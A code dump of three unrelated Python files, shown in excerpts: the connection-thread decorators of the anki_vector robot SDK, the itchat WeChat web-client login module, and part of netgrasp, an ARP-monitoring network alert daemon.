coro: Awaitable) -> Any: """Runs a given awaitable on the connection thread's event loop. Cannot be called from within the connection thread. .. testcode:: import anki_vector async def my_coroutine(): print("Running on the connection thread") return "Finished" with anki_vector.Robot() as robot: result = robot.conn.run_coroutine(my_coroutine()) :param coro: The coroutine, task or any other awaitable which should be executed. :returns: The result of the awaitable's execution. """ if threading.current_thread() is self._thread: raise VectorAsyncException("Attempting to invoke async from same thread." "Instead you may want to use 'run_soon'") if asyncio.iscoroutinefunction(coro) or asyncio.iscoroutine(coro): return self._run_coroutine(coro) if asyncio.isfuture(coro): async def future_coro(): return await coro return self._run_coroutine(future_coro()) if callable(coro): async def wrapped_coro(): return coro() return self._run_coroutine(wrapped_coro()) raise VectorAsyncException("\n\nInvalid parameter to run_coroutine: {}\n" "This function expects a coroutine, task, or awaitable.".format(type(coro))) def _run_coroutine(self, coro): return asyncio.run_coroutine_threadsafe(coro, self._loop) def on_connection_thread(log_messaging: bool = True, requires_control: bool = True, is_cancellable: CancelType = None) -> Callable[[Coroutine[util.Component, Any, None]], Any]: """A decorator generator used internally to denote which functions will run on the connection thread. This unblocks the caller of the wrapped function and allows them to continue running while the messages are being processed. .. code-block:: python import anki_vector class MyComponent(anki_vector.util.Component): @connection._on_connection_thread() async def on_connection_thread(self): # Do work on the connection thread :param log_messaging: True if the log output should include the entire message or just the size. Recommended for large binary return values. :param requires_control: True if the function should wait until behavior control is granted before executing. :param is_cancellable: use a valid enum of :class:`CancelType` to specify the type of cancellation for the function. Defaults to 'None' implying no support for responding to cancellation. :returns: A decorator which has 3 possible returns based on context: the result of the decorated function, the :class:`concurrent.futures.Future` which points to the decorated function, or the :class:`asyncio.Future` which points to the decorated function. These contexts are: when the robot is a :class:`~anki_vector.robot.Robot`, when the robot is an :class:`~anki_vector.robot.AsyncRobot`, and when called from the connection thread respectively. """ def _on_connection_thread_decorator(func: Coroutine) -> Any: """A decorator which specifies a function to be executed on the connection thread :params func: The function to be decorated :returns: There are 3 possible returns based on context: the result of the decorated function, the :class:`concurrent.futures.Future` which points to the decorated function, or the :class:`asyncio.Future` which points to the decorated function. These contexts are: when the robot is a :class:`anki_vector.robot.Robot`, when the robot is an :class:`anki_vector.robot.AsyncRobot`, and when called from the connection thread respectively. """ if not asyncio.iscoroutinefunction(func): raise VectorAsyncException("\n\nCannot define non-coroutine function '{}' to run on connection thread.\n" "Make sure the function is defined using 'async def'.".format(func.__name__ if hasattr(func, "__name__") else func)) @functools.wraps(func) async def log_handler(conn: Connection, func: Coroutine, logger: logging.Logger, *args: List[Any], **kwargs: Dict[str, Any]) -> Coroutine: """Wrap the provided coroutine to better express exceptions as specific :class:`anki_vector.exceptions.VectorException`s, and adds logging to incoming (from the robot) and outgoing (to the robot) messages. """ result = None # TODO: only have the request wait for control if we're not done. If done raise an exception. control = conn.control_granted_event if requires_control and not control.is_set(): if not conn.requires_behavior_control: raise VectorControlException(func.__name__) logger.info(f"Delaying {func.__name__} until behavior control is granted") await asyncio.wait([conn.control_granted_event.wait()], timeout=10) message = args[1:] outgoing = message if log_messaging else "size = {} bytes".format(sys.getsizeof(message)) logger.debug(f'Outgoing {func.__name__}: {outgoing}') try: result = await func(*args, **kwargs) except grpc.RpcError as rpc_error: raise connection_error(rpc_error) from rpc_error incoming = str(result).strip() if log_messaging else "size = {} bytes".format(sys.getsizeof(result)) logger.debug(f'Incoming {func.__name__}: {type(result).__name__} {incoming}') return result @functools.wraps(func) def result(*args: List[Any], **kwargs: Dict[str, Any]) -> Any: """The function that is the result of the decorator. Provides a wrapped function. :param _return_future: A hidden parameter which allows the wrapped function to explicitly return a future (default for AsyncRobot) or not (default for Robot). :returns: Based on context this can return the result of the decorated function, the :class:`concurrent.futures.Future` which points to the decorated function, or the :class:`asyncio.Future` which points to the decorated function. These contexts are: when the robot is a :class:`anki_vector.robot.Robot`, when the robot is an :class:`anki_vector.robot.AsyncRobot`, and when called from the connection thread respectively.""" self = args[0] # Get the self reference from the function call # if the call supplies a _return_future parameter then override force_async with that. _return_future = kwargs.pop('_return_future', self.force_async) action_id = None if is_cancellable == CancelType.CANCELLABLE_ACTION: action_id = self._get_next_action_id() kwargs['_action_id'] = action_id wrapped_coroutine = log_handler(self.conn, func, self.logger, *args, **kwargs) if threading.current_thread() == self.conn.thread: if self.conn.loop.is_running(): return asyncio.ensure_future(wrapped_coroutine, loop=self.conn.loop) raise VectorAsyncException("\n\nThe connection thread loop is not running, but a " "function '{}' is being invoked on that thread.\n".format(func.__name__ if hasattr(func, "__name__") else func)) future = asyncio.run_coroutine_threadsafe(wrapped_coroutine, self.conn.loop) if is_cancellable == CancelType.CANCELLABLE_ACTION: def user_cancelled_action(fut): if action_id is None: return if fut.cancelled(): self._abort_action(action_id) future.add_done_callback(user_cancelled_action) if is_cancellable == CancelType.CANCELLABLE_BEHAVIOR: def user_cancelled_behavior(fut): if fut.cancelled(): self._abort_behavior() future.add_done_callback(user_cancelled_behavior) if requires_control: self.conn.active_commands.append(future) def clear_when_done(fut): if fut in self.conn.active_commands: self.conn.active_commands.remove(fut) future.add_done_callback(clear_when_done) if _return_future: return future try: return future.result() except futures.CancelledError: self.logger.warning(f"{func.__name__} cancelled because behavior control was lost") return None return result return _on_connection_thread_decorator
login.py
import os, time, re, io import threading import json, xml.dom.minidom import random import traceback, logging try: from httplib import BadStatusLine except ImportError: from http.client import BadStatusLine import requests from pyqrcode import QRCode from .. import config, utils from ..returnvalues import ReturnValue from ..storage.templates import wrap_user_dict from .contact import update_local_chatrooms, update_local_friends from .messages import produce_msg logger = logging.getLogger('itchat') def load_login(core): core.login = login core.get_QRuuid = get_QRuuid core.get_QR = get_QR core.check_login = check_login core.web_init = web_init core.show_mobile_login = show_mobile_login core.start_receiving = start_receiving core.get_msg = get_msg core.logout = logout def login(self, enableCmdQR=False, picDir=None, qrCallback=None, loginCallback=None, exitCallback=None): if self.alive or self.isLogging: logger.warning('itchat has already logged in.') return self.isLogging = True while self.isLogging: uuid = push_login(self) if uuid: qrStorage = io.BytesIO() else: logger.info('Getting uuid of QR code.') while not self.get_QRuuid(): time.sleep(1) logger.info('Downloading QR code.') qrStorage = self.get_QR(enableCmdQR=enableCmdQR, picDir=picDir, qrCallback=qrCallback) logger.info('Please scan the QR code to log in.') isLoggedIn = False while not isLoggedIn: status = self.check_login() if hasattr(qrCallback, '__call__'): qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue()) if status == '200': isLoggedIn = True elif status == '201': if isLoggedIn is not None: logger.info('Please press confirm on your phone.') isLoggedIn = None elif status != '408': break time.sleep(1) if isLoggedIn: break elif self.isLogging: logger.info('Log in time out, reloading QR code.') else: return # log in process is stopped by user logger.info('Loading the contact, this may take a little while.') self.web_init() self.show_mobile_login() self.get_contact(True) if hasattr(loginCallback, '__call__'): r = loginCallback() else: utils.clear_screen() if os.path.exists(picDir or config.DEFAULT_QR): os.remove(picDir or config.DEFAULT_QR) logger.info('Login successfully as %s' % self.storageClass.nickName) self.start_receiving(exitCallback) self.isLogging = False def push_login(core): cookiesDict = core.s.cookies.get_dict() if 'wxuin' in cookiesDict: url = '%s/cgi-bin/mmwebwx-bin/webwxpushloginurl?uin=%s' % ( config.BASE_URL, cookiesDict['wxuin']) headers = { 'User-Agent' : config.USER_AGENT } r = core.s.get(url, headers=headers).json() if 'uuid' in r and r.get('ret') in (0, '0'): core.uuid = r['uuid'] return r['uuid'] return False def get_QRuuid(self): url = '%s/jslogin' % config.BASE_URL params = { 'appid' : 'wx782c26e4c19acffb', 'fun' : 'new', 'redirect_uri' : 'https://wx.qq.com/cgi-bin/mmwebwx-bin/webwxnewloginpage?mod=desktop', 'lang' : 'zh_CN' } headers = { 'User-Agent' : config.USER_AGENT } r = self.s.get(url, params=params, headers=headers) regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";' data = re.search(regx, r.text) if data and data.group(1) == '200': self.uuid = data.group(2) return self.uuid def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None): uuid = uuid or self.uuid picDir = picDir or config.DEFAULT_QR qrStorage = io.BytesIO() qrCode = QRCode('https://login.weixin.qq.com/l/' + uuid) qrCode.png(qrStorage, scale=10) if hasattr(qrCallback, '__call__'): qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue()) else: with open(picDir, 'wb') as f: f.write(qrStorage.getvalue()) if enableCmdQR: utils.print_cmd_qr(qrCode.text(1), enableCmdQR=enableCmdQR) else: utils.print_qr(picDir) return qrStorage def check_login(self, uuid=None): uuid = uuid or self.uuid url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL localTime = int(time.time()) params = 'loginicon=true&uuid=%s&tip=1&r=%s&_=%s' % ( uuid, int(-localTime / 1579), localTime) headers = { 'User-Agent' : config.USER_AGENT } r = self.s.get(url, params=params, headers=headers) regx = r'window.code=(\d+)' data = re.search(regx, r.text) if data and data.group(1) == '200': if process_login_info(self, r.text): return '200' else: return '400' elif data: return data.group(1) else: return '400' def process_login_info(core, loginContent): ''' when finish login (scanning qrcode) * syncUrl and fileUploadingUrl will be fetched * deviceid and msgid will be generated * skey, wxsid, wxuin, pass_ticket will be fetched ''' regx = r'window.redirect_uri="(\S+)";' core.loginInfo['url'] = re.search(regx, loginContent).group(1) headers = { 'User-Agent' : config.USER_AGENT, 'client-version' : config.UOS_PATCH_CLIENT_VERSION, 'extspam' : config.UOS_PATCH_EXTSPAM, 'referer' : 'https://wx.qq.com/?&lang=zh_CN&target=t' } r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False) core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')] for indexUrl, detailedUrl in ( ("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")), ("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")), ("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")), ("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")), ("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))): fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl] if indexUrl in core.loginInfo['url']: core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \ fileUrl, syncUrl break else: core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url'] core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17] core.loginInfo['logintime'] = int(time.time() * 1e3) core.loginInfo['BaseRequest'] = {} cookies = core.s.cookies.get_dict() core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = "" core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = cookies["wxsid"] core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = cookies["wxuin"] core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = core.loginInfo['deviceid'] # A question : why pass_ticket == DeviceID ? # deviceID is only a randomly generated number # UOS PATCH By luvletter2333, Sun Feb 28 10:00 PM # for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes: # if node.nodeName == 'skey': # core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data # elif node.nodeName == 'wxsid': # core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data # elif node.nodeName == 'wxuin': # core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data # elif node.nodeName == 'pass_ticket': # core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data if not all([key in core.loginInfo for key in ('skey', 'wxsid', 'wxuin', 'pass_ticket')]): logger.error('Your wechat account may be LIMITED to log in WEB wechat, error info:\n%s' % r.text) core.isLogging = False return False return True def web_init(self): url = '%s/webwxinit' % self.loginInfo['url'] params = { 'r': int(-time.time() / 1579), 'pass_ticket': self.loginInfo['pass_ticket'], } data = { 'BaseRequest': self.loginInfo['BaseRequest'], } headers = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent' : config.USER_AGENT, } r = self.s.post(url, params=params, data=json.dumps(data), headers=headers) dic = json.loads(r.content.decode('utf-8', 'replace')) # deal with login info utils.emoji_formatter(dic['User'], 'NickName') self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount']) self.loginInfo['User'] = wrap_user_dict(utils.struct_friend_info(dic['User'])) self.memberList.append(self.loginInfo['User']) self.loginInfo['SyncKey'] = dic['SyncKey'] self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val']) for item in dic['SyncKey']['List']]) self.storageClass.userName = dic['User']['UserName'] self.storageClass.nickName = dic['User']['NickName'] # deal with contact list returned when init contactList = dic.get('ContactList', []) chatroomList, otherList = [], [] for m in contactList: if m['Sex'] != 0: otherList.append(m) elif '@@' in m['UserName']: m['MemberList'] = [] # don't let dirty info pollute the list chatroomList.append(m) elif '@' in m['UserName']: # mp will be dealt in update_local_friends as well otherList.append(m) if chatroomList: update_local_chatrooms(self, chatroomList) if otherList: update_local_friends(self, otherList) return dic def show_mobile_login(self): url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % ( self.loginInfo['url'], self.loginInfo['pass_ticket']) data = { 'BaseRequest' : self.loginInfo['BaseRequest'], 'Code' : 3, 'FromUserName' : self.storageClass.userName, 'ToUserName' : self.storageClass.userName, 'ClientMsgId' : int(time.time()), } headers = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent' : config.USER_AGENT, } r = self.s.post(url, data=json.dumps(data), headers=headers) return ReturnValue(rawResponse=r) def start_receiving(self, exitCallback=None, getReceivingFnOnly=False): self.alive = True def maintain_loop(): retryCount = 0 while self.alive: try: i = sync_check(self) if i is None: self.alive = False elif i == '0': pass else: msgList, contactList = self.get_msg() if msgList: msgList = produce_msg(self, msgList) for msg in msgList: self.msgList.put(msg) if contactList: chatroomList, otherList = [], [] for contact in contactList: if '@@' in contact['UserName']: chatroomList.append(contact) else: otherList.append(contact) chatroomMsg = update_local_chatrooms(self, chatroomList) chatroomMsg['User'] = self.loginInfo['User'] self.msgList.put(chatroomMsg) update_local_friends(self, otherList) retryCount = 0 except requests.exceptions.ReadTimeout: pass except: retryCount += 1 logger.error(traceback.format_exc()) if self.receivingRetryCount < retryCount: self.alive = False else: time.sleep(1) self.logout() if hasattr(exitCallback, '__call__'): exitCallback() else: logger.info('LOG OUT!') if getReceivingFnOnly: return maintain_loop else: maintainThread = threading.Thread(target=maintain_loop) maintainThread.setDaemon(True) maintainThread.start() def sync_check(self): url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url']) params = { 'r' : int(time.time() * 1000), 'skey' : self.loginInfo['skey'], 'sid' : self.loginInfo['wxsid'], 'uin' : self.loginInfo['wxuin'], 'deviceid' : self.loginInfo['deviceid'], 'synckey' : self.loginInfo['synckey'], '_' : self.loginInfo['logintime'], } headers = { 'User-Agent' : config.USER_AGENT } self.loginInfo['logintime'] += 1 try: r = self.s.get(url, params=params, headers=headers, timeout=config.TIMEOUT) except requests.exceptions.ConnectionError as e: try: if not isinstance(e.args[0].args[1], BadStatusLine): raise # will return a package with status '0 -' # and value like: # 6f:00:8a:9c:09:74:e4:d8:e0:14:bf:96:3a:56:a0:64:1b:a4:25:5d:12:f4:31:a5:30:f1:c6:48:5f:c3:75:6a:99:93 # seems like status of typing, but before I make further achievement code will remain like this return '2' except: raise r.raise_for_status() regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}' pm = re.search(regx, r.text) if pm is None or pm.group(1) != '0': logger.debug('Unexpected sync check result: %s' % r.text) return None return pm.group(2) def get_msg(self): url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % ( self.loginInfo['url'], self.loginInfo['wxsid'], self.loginInfo['skey'],self.loginInfo['pass_ticket']) data = { 'BaseRequest' : self.loginInfo['BaseRequest'], 'SyncKey' : self.loginInfo['SyncKey'], 'rr' : ~int(time.time()), } headers = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent' : config.USER_AGENT } r = self.s.post(url, data=json.dumps(data), headers=headers, timeout=config.TIMEOUT) dic = json.loads(r.content.decode('utf-8', 'replace')) if dic['BaseResponse']['Ret'] != 0: return None, None self.loginInfo['SyncKey'] = dic['SyncKey'] self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val']) for item in dic['SyncCheckKey']['List']]) return dic['AddMsgList'], dic['ModContactList'] def logout(self): if self.alive: url = '%s/webwxlogout' % self.loginInfo['url'] params = { 'redirect' : 1, 'type' : 1, 'skey' : self.loginInfo['skey'], } headers = { 'User-Agent' : config.USER_AGENT } self.s.get(url, params=params, headers=headers) self.alive = False self.isLogging = False self.s.cookies.clear() del self.chatroomList[:] del self.memberList[:] del self.mpList[:] return ReturnValue({'BaseResponse': { 'ErrMsg': 'logout successfully.', 'Ret': 0, }})
netgrasp.py
from utils import debug from utils import exclusive_lock from utils import email from utils import simple_timer from utils import pretty from config import config from notify import notify from database import database import logging import logging.handlers import pwd import os import datetime import time netgrasp_instance = None BROADCAST = 'ff:ff:ff:ff:ff:ff' ALERT_TYPES = ['requested_ip', 'first_requested_ip', 'first_requested_ip_recently', 'seen_device', 'first_seen_device', 'first_seen_device_recently', 'seen_mac', 'first_seen_mac', 'seen_ip', 'first_seen_ip', 'seen_host', 'first_seen_host', 'seen_vendor', 'first_seen_vendor', 'device_stale', 'request_stale', 'changed_ip', 'duplicate_ip', 'duplicate_mac', 'network_scan', 'ip_not_on_network', 'src_mac_broadcast', 'requested_self'] EVENT_REQUEST_IP, EVENT_FIRST_REQUEST_IP, EVENT_FIRST_REQUEST_RECENTLY_IP, EVENT_SEEN_DEVICE, EVENT_FIRST_SEEN_DEVICE, EVENT_FIRST_SEEN_DEVICE_RECENTLY, EVENT_SEEN_MAC, EVENT_FIRST_SEEN_MAC, EVENT_SEEN_IP, EVENT_FIRST_SEEN_IP, EVENT_SEEN_HOST, EVENT_FIRST_SEEN_HOST, EVENT_SEEN_VENDOR, EVENT_FIRST_SEEN_VENDOR, EVENT_STALE, EVENT_REQUEST_STALE, EVENT_CHANGED_IP, EVENT_DUPLICATE_IP, EVENT_DUPLICATE_MAC, EVENT_SCAN, EVENT_IP_NOT_ON_NETWORK, EVENT_SRC_MAC_BROADCAST, EVENT_REQUESTED_SELF = ALERT_TYPES DIGEST_TYPES = ['daily', 'weekly'] PROCESSED_ALERT = 1 PROCESSED_DAILY_DIGEST = 2 PROCESSED_WEEKLY_DIGEST = 4 PROCESSED_NOTIFICATION = 8 DEFAULT_CONFIG = ['/etc/netgrasp.cfg', '/usr/local/etc/netgrasp.cfg', '~/.netgrasp.cfg', './netgrasp.cfg'] DEFAULT_USER = "daemon" DEFAULT_GROUP = "daemon" DEFAULT_LOGLEVEL = logging.INFO DEFAULT_LOGFILE = "/var/log/netgrasp.log" DEFAULT_LOGFORMAT = "%(asctime)s [%(levelname)s/%(processName)s] %(message)s" DEFAULT_PIDFILE = "/var/run/netgrasp.pid" DEFAULT_DBLOCK = "/tmp/.netgrasp_database_lock" class Netgrasp(object): def __init__(self, config_filename=None): self.config = config_filename or DEFAULT_CONFIG self.listen = {} self.security = {} self.database = {} self.logging = {} self.email = {} self.notification = {} self.pcap = {} def _load_debugger(self): # We've not yet loaded configuration, so log to stdout. self.logger = logging.getLogger(__name__) self.debugger = debug.Debugger(self.verbose, self.logger, debug.PRINT) self.debugger.handler = logging.StreamHandler() formatter = logging.Formatter(DEFAULT_LOGFORMAT) self.debugger.handler.setFormatter(formatter) self.logger.addHandler(self.debugger.handler) def _enable_debugger(self): if self.daemonize: try: self.debugger.handler = logging.FileHandler(self.logging["filename"]) except Exception as e: self.debugger.error("fatal exception: %s", (e,)) self.debugger.critical("failed to open log file %s for writing (as user %s), exiting", (self.logging["filename"], self.debugger.whoami())) else: self.debugger.handler = logging.StreamHandler() formatter = logging.Formatter(DEFAULT_LOGFORMAT) self.debugger.handler.setFormatter(formatter) self.logger.addHandler(self.debugger.handler) self.logger.setLevel(self.logging["level"]) def _load_configuration(self): self.configuration = config.Config(self.debugger, filename=self.config) # Load listen parameters. self.listen["interface"] = self.configuration.GetText("Listen", "interface", None, False) self.listen["active_timeout"] = self.configuration.GetInt("Listen", "active_timeout", 60 * 60 * 2, False) delay = self.configuration.GetInt("Listen", "delay", 15, False) if delay > 30: delay = 30 elif delay < 1: delay = 1 self.listen["delay"] = delay # Load security parameters. self.security["user"] = self.configuration.GetText("Security", "user", DEFAULT_USER, False) self.security["group"] = self.configuration.GetText("Security", "group", DEFAULT_GROUP, False) # Load database parameters. self.database["filename"] = self.configuration.GetText("Database", "filename", None, False) self.database["lock"] = self.configuration.GetText("Database", "lockfile", DEFAULT_DBLOCK, False) self.database["gcenabled"] = self.configuration.GetBoolean("Database", "gcenabled", True, False) if self.database["gcenabled"]: self.database["oldest_arp"] = datetime.timedelta(seconds=self.configuration.GetInt("Database", "oldest_arp", 60 * 60 * 24 * 7 * 2, False)) self.database["oldest_event"] = datetime.timedelta(seconds=self.configuration.GetInt("Database", "oldest_event", 60 * 60 * 24 * 7 * 2, False)) # Load logging parameters. self.logging["filename"] = self.configuration.GetText('Logging', 'filename', DEFAULT_LOGFILE) self.logging["pidfile"] = self.configuration.GetText('Logging', 'pidfile', DEFAULT_PIDFILE, False) if self.verbose: self.logging["level"] = logging.DEBUG self.debugger.debug("log level forced to verbose") else: self.logging["level"] = self.configuration.GetText('Logging', 'level', DEFAULT_LOGLEVEL, False) # Load email parameters. self.email["enabled"] = self.configuration.GetBoolean("Email", "enabled", False, False) if self.email["enabled"]: self.email["to"] = self.configuration.GetEmailList("Email", "to", None) self.email["from"] = self.configuration.GetEmailList("Email", "from", None) self.email["hostname"] = self.configuration.GetText("Email", "smtp_hostname", None) self.email["port"] = self.configuration.GetInt("Email", "smtp_port", 587) self.email["mode"] = self.configuration.GetText("Email", "smtp_mode", None) self.email["username"] = self.configuration.GetText("Email", "smtp_username", None) self.email["password"] = self.configuration.GetText("Email", "smtp_password", None) self.email["alerts"] = self.configuration.GetTextList("Email", "alerts", None, False) self.email["digests"] = self.configuration.GetTextList("Email", "digests", None, False) # Load notification parameters. self.notification["enabled"] = self.configuration.GetBoolean("Notification", "enabled", False, False) if self.notification["enabled"]: self.notification["alerts"] = self.configuration.GetTextList("Notification", "alerts", None, False) def _include_dependencies(self): try: import sqlite3 except Exception as e: self.debugger.error("fatal exception: %s", (e,)) self.debugger.critical("failed to import sqlite3 (as user %s), try 'pip install sqlite3', exiting", (self.debugger.whoami())) self.debugger.info("successfuly imported sqlite3") try: import dpkt except Exception as e: self.debugger.error("fatal exception: %s", (e,)) self.debugger.critical("failed to import dpkt (as user %s), try 'pip install dpkt', exiting", (self.debugger.whoami())) self.debugger.info("successfuly imported dpkt") if self.daemonize: try: import daemonize except Exception as e: self.debugger.error("fatal exception: %s", (e,)) self.debugger.critical("failed to import daemonize (as user %s), try 'pip install daemonize', exiting", (self.debugger.whoami())) self.debugger.info("successfuly imported daemonize") if self.email["enabled"]: try: import pyzmail except Exception as e: self.debugger.error("fatal exception: %s", (e,)) self.debugger.critical("failed to import pyzmail (as user %s), try: 'pip install pyzmail' or disable [Email], exiting.", (self.debugger.whoami(),)) self.debugger.info('successfuly imported pyzmail') if self.notification["enabled"]: try: import ntfy except Exception as e: self.debugger.error("fatal exception: %s", e) self.debugger.critical("failed to import ntfy (as user %s), try 'pip install ntfy', exiting", (self.debugger.whoami())) self.debugger.info('successfuly imported ntfy') # Drop root permissions when no longer needed. def drop_root(self, ng): import grp os.setgroups([]) os.setgid(grp.getgrnam(ng.security["group"]).gr_gid) os.setuid(pwd.getpwnam(ng.security["user"]).pw_uid) ng.debugger.info('running as user %s', (self.debugger.whoami(),)) # Determine if pid in pidfile is a running process. def is_running(self): import errno running = False if self.logging["pidfile"]: if os.path.isfile(self.logging["pidfile"]): f = open(self.logging["pidfile"]) pid_string = f.readline() f.close() if pid_string: pid = int(pid_string) else: pid = 0 if pid > 0: self.debugger.info("Found pidfile %s, contained pid %d", (self.logging["pidfile"], pid)) try: os.kill(pid, 0) except OSError as e: if e.errno == errno.EPERM: running = pid else: running = pid return running # Simple, short text string used for heartbeat. HEARTBEAT = 'nghb' # Macimum seconds to process before returning to main loop MAXSECONDS = 2 # This is our main program loop. def main(*pcap): import multiprocessing from update import update ng = netgrasp_instance ng.debugger.info("main process running as user %s", (ng.debugger.whoami(),)) if not pcap: # We are running in the foreground as root. get_pcap() ng.drop_root(ng) # At this point we should no longer have/need root privileges. assert (os.getuid() != 0) and (os.getgid() != 0), 'Failed to drop root privileges, aborting.' ng.email["instance"] = email.Email() ng.notification["instance"] = notify.Notify() ng.debugger.info("initiating wiretap process") parent_conn, child_conn = multiprocessing.Pipe() child = multiprocessing.Process(name="wiretap", target=wiretap, args=[ng.pcap["instance"], child_conn]) child.daemon = True child.start() if child.is_alive(): ng.debugger.debug("initiated wiretap process") else: ng.debugger.debug("wiretap failed to start") try: ng.db = database.Database() except Exception: ng.debugger.dump_exception("main() caught exception creating database") ng.debugger.critical("failed to open or create %s (as user %s), exiting", (ng.database["filename"], ng.debugger.whoami())) ng.debugger.info("opened %s as user %s", (ng.database["filename"], ng.debugger.whoami())) ng.db.cursor = ng.db.connection.cursor() # http://www.sqlite.org/wal.html ng.db.cursor.execute("PRAGMA journal_mode=WAL") try: ng.db.cursor.execute("SELECT value FROM state WHERE key = 'schema_version'") schema_version = ng.db.cursor.fetchone() if schema_version: version = schema_version[0] else: version = 0 if update.needed(version): ng.debugger.critical("schema updates are required, run 'netgrasp update'") except: version = 0 create_database() if child.is_alive(): run = True else: ng.debugger.error("wiretap process gone away: %d", (child.exitcode,)) run = False last_heartbeat = datetime.datetime.now() while run: try: now = datetime.datetime.now() ng.debugger.debug("top of master while loop: %s", (now,)) parent_conn.send(HEARTBEAT) detect_stale_ips() detect_netscans() detect_anomalies() send_notifications() send_email_alerts() send_email_digests() garbage_collection() refresh_dns_cache() ng.debugger.debug("sleeping for %d seconds", (ng.listen["delay"],)) time.sleep(ng.listen["delay"]) heartbeat = False while parent_conn.poll(): message = parent_conn.recv() if message == HEARTBEAT: heartbeat = True # It's possible to receive multiple heartbeats, but many or one is the same to us. if heartbeat: ng.debugger.debug("received heartbeat from wiretap process") last_heartbeat = now if not child.is_alive(): ng.debugger.error("wiretap process gone away: %d", (child.exitcode,)) run = False # If we haven't heard from the wiretap process in >1 minute, exit. time_to_exit = last_heartbeat + datetime.timedelta(minutes=3) if now >= time_to_exit: run = False ng.debugger.error("No heartbeats from wiretap process for >3 minutes.") except Exception: ng.debugger.dump_exception("main() while loop caught exception") ng.debugger.critical("Exiting") def get_pcap(): import socket assert os.getuid() == 0, 'Unable to initiate pcap, must be run as root.' ng = netgrasp_instance try: import pcap except Exception as e: ng.debugger.error("fatal exception: %s", (e,)) ng.debugger.critical("Fatal error: failed to import pcap, try: 'pip install pypcap', exiting") devices = pcap.findalldevs() if len(devices) <= 0: ng.debugger.critical("Fatal error: pcap identified no devices, try running tcpdump manually to debug.") ng.pcap["network"], ng.pcap["netmask"] = pcap.lookupnet(ng.listen["interface"]) try: ng.pcap["instance"] = pcap.pcap(name=ng.listen["interface"], snaplen=256, promisc=True, timeout_ms = 100, immediate=True) ng.pcap["instance"].setfilter('arp') except Exception as e: ng.debugger.critical("""Failed to invoke pcap. Fatal exception: %s, exiting.""" % e) ng.debugger.warning("listening for arp traffic on %s: %s/%s", (ng.listen["interface"], socket.inet_ntoa(ng.pcap["network"]), socket.inet_ntoa(ng.pcap["netmask"]))) return ng.pcap # Child process: wiretap, uses pcap to sniff arp packets. def wiretap(pc, child_conn): ng = netgrasp_instance ng.debugger.debug('top of wiretap') try: import dpkt except Exception as e: ng.debugger.error("fatal exception: %s", (e,)) ng.debugger.critical("failed to import dpkt, try: 'pip install dpkt', exiting") try: import pcap except Exception as e: ng.debugger.error("fatal exception: %s", (e,)) ng.debugger.critical("failed to import pcap, try: 'pip install pypcap', exiting") assert (os.getuid() != 0) and (os.getgid() != 0), "Failed to drop root privileges, aborting." try: ng.db = database.Database() except Exception as e: ng.debugger.error("%s", (e,)) ng.debugger.critical("failed to open or create %s (as user %s), exiting", (ng.database["filename"], ng.debugger.whoami())) ng.debugger.info("opened %s as user %s", (ng.database["filename"], ng.debugger.whoami())) ng.db.cursor = ng.db.connection.cursor() run = True last_heartbeat = datetime.datetime.now() while run: try: now = datetime.datetime.now() ng.debugger.debug("[%d] top of while loop: %s", (run, now)) child_conn.send(HEARTBEAT) # Wait an arp packet, then loop again. pc.loop(1, received_arp, child_conn) heartbeat = False while child_conn.poll(): message = child_conn.recv() if message == HEARTBEAT: heartbeat = True # It's possible to receive multiple heartbeats, but many or one is the same to us. if heartbeat: ng.debugger.debug("received heartbeat from main process") last_heartbeat = now # If we haven't heard from the main process in >1 minute, exit. time_to_exit = last_heartbeat + datetime.timedelta(minutes=3) if now >= time_to_exit: run = False except Exception: ng.debugger.dump_exception("wiretap() while loop caught exception") ng.debugger.critical("No heartbeats from main process for >3 minutes, exiting.") def ip_on_network(ip): ng = netgrasp_instance try: import struct import socket ng.debugger.debug("entering address_on_network(%s)", (ip,)) numeric_ip = struct.unpack("<L", socket.inet_aton(ip))[0] cidr = sum([bin(int(x)).count("1") for x in socket.inet_ntoa(ng.pcap["netmask"]).split(".")]) netmask = struct.unpack("<L", ng.pcap["network"])[0] & ((2L<<int(cidr) - 1) - 1) return numeric_ip & netmask == netmask except: ng.debugger.dump_exception("address_in_network() caught exception") # Assumes we already have the database lock. def log_event(mid, iid, did, rid, event, have_lock = False): ng = netgrasp_instance try: 